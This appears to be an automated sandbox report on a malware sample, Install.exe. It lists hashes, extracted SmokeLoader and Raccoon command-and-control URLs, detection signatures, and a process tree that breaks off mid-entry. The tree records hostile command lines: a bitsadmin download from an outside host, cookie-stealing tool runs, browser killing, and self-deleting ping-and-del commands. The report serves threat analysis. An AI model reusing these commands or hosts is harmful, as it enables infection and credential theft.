Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1805s
  • max time network
    1804s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    04-05-2021 05:53

General

  • Target

    Install.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Extracted

Family

raccoon

Botnet

afefd33a49c7cbd55d417545269920f24c85aa37

Attributes
  • url4cnc

    https://telete.in/jagressor_kz

rc4.plain
rc4.plain

Signatures

  • Detected facebook phishing page
  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 64 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 52 IoCs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 29 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 32 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 40 IoCs
  • Modifies data under HKEY_USERS 53 IoCs
  • Modifies registry class 34 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 11 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 4 IoCs
  • Suspicious behavior: MapViewOfSection 40 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 16 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:460
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        PID:876
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {DCA6C1A4-7882-4A09-B0B2-5283AE597392} S-1-5-18:NT AUTHORITY\System:Service:
          3⤵
            PID:1548
            • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
              "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 8080
              4⤵
              • Executes dropped EXE
              PID:3320
            • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
              "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 8080
              4⤵
              • Executes dropped EXE
              PID:4580
            • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
              "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080
              4⤵
              • Executes dropped EXE
              PID:2516
            • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
              "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 8080
              4⤵
              • Executes dropped EXE
              PID:2880
            • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
              "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080
              4⤵
              • Executes dropped EXE
              PID:5092
            • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
              "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080
              4⤵
              • Executes dropped EXE
              PID:1856
            • C:\Windows\system32\rundll32.exe
              C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\PzbYEKUDEJ\PzbYEKUDEJ.dll",PzbYEKUDEJ
              4⤵
              • Windows security modification
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              PID:5964
          • C:\Windows\system32\taskeng.exe
            taskeng.exe {950865E2-4160-4782-BAE1-7EE46E705EEA} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
            3⤵
              PID:7544
              • C:\Users\Admin\AppData\Roaming\haefsbf
                C:\Users\Admin\AppData\Roaming\haefsbf
                4⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:7552
                • C:\Users\Admin\AppData\Roaming\haefsbf
                  C:\Users\Admin\AppData\Roaming\haefsbf
                  5⤵
                  • Executes dropped EXE
                  • Checks SCSI registry key(s)
                  • Suspicious behavior: MapViewOfSection
                  PID:7624
            • C:\Windows\system32\taskeng.exe
              taskeng.exe {5EECD4A4-F2F8-4AF7-99F7-8DFF355C1132} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
              3⤵
                PID:7948
                • C:\Users\Admin\AppData\Roaming\haefsbf
                  C:\Users\Admin\AppData\Roaming\haefsbf
                  4⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  PID:7548
                  • C:\Users\Admin\AppData\Roaming\haefsbf
                    C:\Users\Admin\AppData\Roaming\haefsbf
                    5⤵
                    • Executes dropped EXE
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: MapViewOfSection
                    PID:8000
              • C:\Windows\system32\taskeng.exe
                taskeng.exe {812D8BAE-E6B6-42B1-BDE4-FC4154CEB2EB} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
                3⤵
                  PID:7980
                  • C:\Users\Admin\AppData\Roaming\haefsbf
                    C:\Users\Admin\AppData\Roaming\haefsbf
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:7696
                    • C:\Users\Admin\AppData\Roaming\haefsbf
                      C:\Users\Admin\AppData\Roaming\haefsbf
                      5⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:5292
              • C:\Windows\system32\msiexec.exe
                C:\Windows\system32\msiexec.exe /V
                2⤵
                • Enumerates connected drives
                • Drops file in Windows directory
                • Modifies data under HKEY_USERS
                • Modifies registry class
                • Suspicious use of AdjustPrivilegeToken
                PID:2392
                • C:\Windows\syswow64\MsiExec.exe
                  C:\Windows\syswow64\MsiExec.exe -Embedding ADC22753F3ADF127DB4786173048B6A4 C
                  3⤵
                  • Loads dropped DLL
                  PID:2544
                • C:\Windows\syswow64\MsiExec.exe
                  C:\Windows\syswow64\MsiExec.exe -Embedding A7A454DFCE15854E49A032B16C708851
                  3⤵
                  • Blocklisted process makes network request
                  • Loads dropped DLL
                  PID:3296
                  • C:\Windows\SysWOW64\taskkill.exe
                    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                    4⤵
                    • Kills process with taskkill
                    PID:3392
                • C:\Windows\syswow64\MsiExec.exe
                  C:\Windows\syswow64\MsiExec.exe -Embedding DBC738FC5EFCDC99BAD1A73C5C4D2912 M Global\MSI0000
                  3⤵
                  • Loads dropped DLL
                  PID:4284
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k SystemNetworkService
                2⤵
                • Drops file in System32 directory
                • Checks processor information in registry
                • Modifies data under HKEY_USERS
                • Modifies registry class
                PID:2844
            • C:\Users\Admin\AppData\Local\Temp\Install.exe
              "C:\Users\Admin\AppData\Local\Temp\Install.exe"
              1⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1996
              • C:\Users\Admin\AppData\Local\Temp\is-5417N.tmp\Install.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-5417N.tmp\Install.tmp" /SL5="$300CC,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
                2⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:1368
                • C:\Users\Admin\AppData\Local\Temp\is-D8I1U.tmp\Ultra.exe
                  "C:\Users\Admin\AppData\Local\Temp\is-D8I1U.tmp\Ultra.exe" /S /UID=burnerch1
                  3⤵
                  • Drops file in Drivers directory
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Drops file in Program Files directory
                  • Suspicious use of WriteProcessMemory
                  PID:1564
                  • C:\Program Files\MSBuild\VYEFSELRBV\ultramediaburner.exe
                    "C:\Program Files\MSBuild\VYEFSELRBV\ultramediaburner.exe" /VERYSILENT
                    4⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:1140
                    • C:\Users\Admin\AppData\Local\Temp\is-5MK2Q.tmp\ultramediaburner.tmp
                      "C:\Users\Admin\AppData\Local\Temp\is-5MK2Q.tmp\ultramediaburner.tmp" /SL5="$6012A,281924,62464,C:\Program Files\MSBuild\VYEFSELRBV\ultramediaburner.exe" /VERYSILENT
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Drops file in Program Files directory
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of WriteProcessMemory
                      PID:1804
                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                        6⤵
                        • Executes dropped EXE
                        PID:1632
                  • C:\Users\Admin\AppData\Local\Temp\84-1b841-554-23eaf-385da1d54186e\ZHojecaelike.exe
                    "C:\Users\Admin\AppData\Local\Temp\84-1b841-554-23eaf-385da1d54186e\ZHojecaelike.exe"
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:1520
                    • C:\Program Files\Internet Explorer\iexplore.exe
                      "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                      5⤵
                      • Modifies Internet Explorer settings
                      • Suspicious behavior: GetForegroundWindowSpam
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SetWindowsHookEx
                      • Suspicious use of WriteProcessMemory
                      PID:1300
                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1300 CREDAT:275457 /prefetch:2
                        6⤵
                        • Modifies Internet Explorer settings
                        • Suspicious use of SetWindowsHookEx
                        PID:1756
                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1300 CREDAT:865289 /prefetch:2
                        6⤵
                        • Modifies Internet Explorer settings
                        • Suspicious use of SetWindowsHookEx
                        PID:7760
                    • C:\Program Files\Internet Explorer\iexplore.exe
                      "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                      5⤵
                        PID:7744
                    • C:\Users\Admin\AppData\Local\Temp\67-ffe83-d10-32181-9b08af4a76b3a\Fiveqyqazhe.exe
                      "C:\Users\Admin\AppData\Local\Temp\67-ffe83-d10-32181-9b08af4a76b3a\Fiveqyqazhe.exe"
                      4⤵
                      • Executes dropped EXE
                      • Modifies system certificate store
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:580
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\m0dbxnqm.w4c\sskiper.exe /s & exit
                        5⤵
                        • Suspicious use of WriteProcessMemory
                        PID:5172
                        • C:\Users\Admin\AppData\Local\Temp\m0dbxnqm.w4c\sskiper.exe
                          C:\Users\Admin\AppData\Local\Temp\m0dbxnqm.w4c\sskiper.exe /s
                          6⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                          PID:5760
                          • C:\Users\Admin\AppData\Local\Temp\2077591606.exe
                            C:\Users\Admin\AppData\Local\Temp\2077591606.exe
                            7⤵
                            • Executes dropped EXE
                            PID:3976
                          • C:\Users\Admin\AppData\Local\Temp\1394496518.exe
                            C:\Users\Admin\AppData\Local\Temp\1394496518.exe
                            7⤵
                            • Executes dropped EXE
                            PID:5036
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\m0dbxnqm.w4c\sskiper.exe & exit
                            7⤵
                              PID:6020
                              • C:\Windows\SysWOW64\PING.EXE
                                ping 0
                                8⤵
                                • Runs ping.exe
                                PID:6056
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xupwlcmy.r0v\KiffMainE1.exe & exit
                          5⤵
                          • Suspicious use of WriteProcessMemory
                          PID:5904
                          • C:\Users\Admin\AppData\Local\Temp\xupwlcmy.r0v\KiffMainE1.exe
                            C:\Users\Admin\AppData\Local\Temp\xupwlcmy.r0v\KiffMainE1.exe
                            6⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:5944
                            • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                              dw20.exe -x -s 532
                              7⤵
                              • Suspicious behavior: GetForegroundWindowSpam
                              PID:6080
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uk4forje.no5\001.exe & exit
                          5⤵
                          • Suspicious use of WriteProcessMemory
                          PID:5988
                          • C:\Users\Admin\AppData\Local\Temp\uk4forje.no5\001.exe
                            C:\Users\Admin\AppData\Local\Temp\uk4forje.no5\001.exe
                            6⤵
                            • Executes dropped EXE
                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                            PID:6032
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yj1o0zwg.gc4\installer.exe /qn CAMPAIGN="654" & exit
                          5⤵
                            PID:6112
                            • C:\Users\Admin\AppData\Local\Temp\yj1o0zwg.gc4\installer.exe
                              C:\Users\Admin\AppData\Local\Temp\yj1o0zwg.gc4\installer.exe /qn CAMPAIGN="654"
                              6⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Enumerates connected drives
                              • Modifies system certificate store
                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of FindShellTrayWindow
                              PID:1996
                              • C:\Windows\SysWOW64\msiexec.exe
                                "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\yj1o0zwg.gc4\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\yj1o0zwg.gc4\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1619855347 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                7⤵
                                  PID:3124
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\akgkdqoi.gsu\gpooe.exe & exit
                              5⤵
                                PID:2144
                                • C:\Users\Admin\AppData\Local\Temp\akgkdqoi.gsu\gpooe.exe
                                  C:\Users\Admin\AppData\Local\Temp\akgkdqoi.gsu\gpooe.exe
                                  6⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Adds Run key to start application
                                  • Modifies system certificate store
                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                  PID:2208
                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    7⤵
                                    • Executes dropped EXE
                                    PID:2272
                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    7⤵
                                    • Executes dropped EXE
                                    PID:2960
                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    7⤵
                                    • Executes dropped EXE
                                    PID:3632
                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    7⤵
                                    • Executes dropped EXE
                                    PID:2044
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\efzblmzm.isy\google-game.exe & exit
                                5⤵
                                  PID:2664
                                  • C:\Users\Admin\AppData\Local\Temp\efzblmzm.isy\google-game.exe
                                    C:\Users\Admin\AppData\Local\Temp\efzblmzm.isy\google-game.exe
                                    6⤵
                                    • Executes dropped EXE
                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                    • Suspicious use of SetWindowsHookEx
                                    PID:2704
                                    • C:\Windows\SysWOW64\rundll32.exe
                                      "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                      7⤵
                                      • Loads dropped DLL
                                      • Modifies registry class
                                      PID:2744
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pyfui033.fum\askinstall39.exe & exit
                                  5⤵
                                    PID:3004
                                    • C:\Users\Admin\AppData\Local\Temp\pyfui033.fum\askinstall39.exe
                                      C:\Users\Admin\AppData\Local\Temp\pyfui033.fum\askinstall39.exe
                                      6⤵
                                      • Executes dropped EXE
                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                      PID:3044
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c taskkill /f /im chrome.exe
                                        7⤵
                                          PID:4524
                                          • C:\Windows\SysWOW64\taskkill.exe
                                            taskkill /f /im chrome.exe
                                            8⤵
                                            • Kills process with taskkill
                                            PID:4556
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pqajhcg3.51k\setup.exe & exit
                                      5⤵
                                        PID:3216
                                        • C:\Users\Admin\AppData\Local\Temp\pqajhcg3.51k\setup.exe
                                          C:\Users\Admin\AppData\Local\Temp\pqajhcg3.51k\setup.exe
                                          6⤵
                                          • Executes dropped EXE
                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                          PID:3252
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\pqajhcg3.51k\setup.exe"
                                            7⤵
                                              PID:3452
                                              • C:\Windows\SysWOW64\PING.EXE
                                                ping 1.1.1.1 -n 1 -w 3000
                                                8⤵
                                                • Runs ping.exe
                                                PID:3492
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nftoivb0.xzu\SunLabsPlayer.exe /S & exit
                                          5⤵
                                            PID:3628
                                            • C:\Users\Admin\AppData\Local\Temp\nftoivb0.xzu\SunLabsPlayer.exe
                                              C:\Users\Admin\AppData\Local\Temp\nftoivb0.xzu\SunLabsPlayer.exe /S
                                              6⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • Drops file in Program Files directory
                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                              PID:3684
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstB81B.tmp\tempfile.ps1"
                                                7⤵
                                                  PID:4120
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstB81B.tmp\tempfile.ps1"
                                                  7⤵
                                                  • Drops file in Program Files directory
                                                  PID:5296
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstB81B.tmp\tempfile.ps1"
                                                  7⤵
                                                    PID:5620
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstB81B.tmp\tempfile.ps1"
                                                    7⤵
                                                      PID:5892
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstB81B.tmp\tempfile.ps1"
                                                      7⤵
                                                        PID:2292
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstB81B.tmp\tempfile.ps1"
                                                        7⤵
                                                          PID:2488
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstB81B.tmp\tempfile.ps1"
                                                          7⤵
                                                          • Checks for any installed AV software in registry
                                                          PID:2808
                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                          "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                          7⤵
                                                          • Download via BitsAdmin
                                                          PID:2760
                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pziF0KFaFHeETEUi -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Drops file in Program Files directory
                                                          PID:4208
                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pAFQ0AcHzbfsw1Wo -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:4272
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstB81B.tmp\tempfile.ps1"
                                                          7⤵
                                                            PID:4340
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstB81B.tmp\tempfile.ps1"
                                                            7⤵
                                                              PID:4688
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstB81B.tmp\tempfile.ps1"
                                                              7⤵
                                                                PID:572
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstB81B.tmp\tempfile.ps1"
                                                                7⤵
                                                                  PID:5248
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstB81B.tmp\tempfile.ps1"
                                                                  7⤵
                                                                    PID:5336
                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                    C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\PzbYEKUDEJ\PzbYEKUDEJ.dll" PzbYEKUDEJ
                                                                    7⤵
                                                                      PID:5728
                                                                      • C:\Windows\system32\rundll32.exe
                                                                        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\PzbYEKUDEJ\PzbYEKUDEJ.dll" PzbYEKUDEJ
                                                                        8⤵
                                                                        • Drops file in System32 directory
                                                                        • Drops file in Program Files directory
                                                                        PID:5732
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstB81B.tmp\tempfile.ps1"
                                                                      7⤵
                                                                        PID:5644
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstB81B.tmp\tempfile.ps1"
                                                                        7⤵
                                                                          PID:5052
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstB81B.tmp\tempfile.ps1"
                                                                          7⤵
                                                                            PID:6128
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstB81B.tmp\tempfile.ps1"
                                                                            7⤵
                                                                              PID:1680
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstB81B.tmp\tempfile.ps1"
                                                                              7⤵
                                                                                PID:7560
                                                                              • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                PID:7668
                                                                          • C:\Windows\System32\cmd.exe
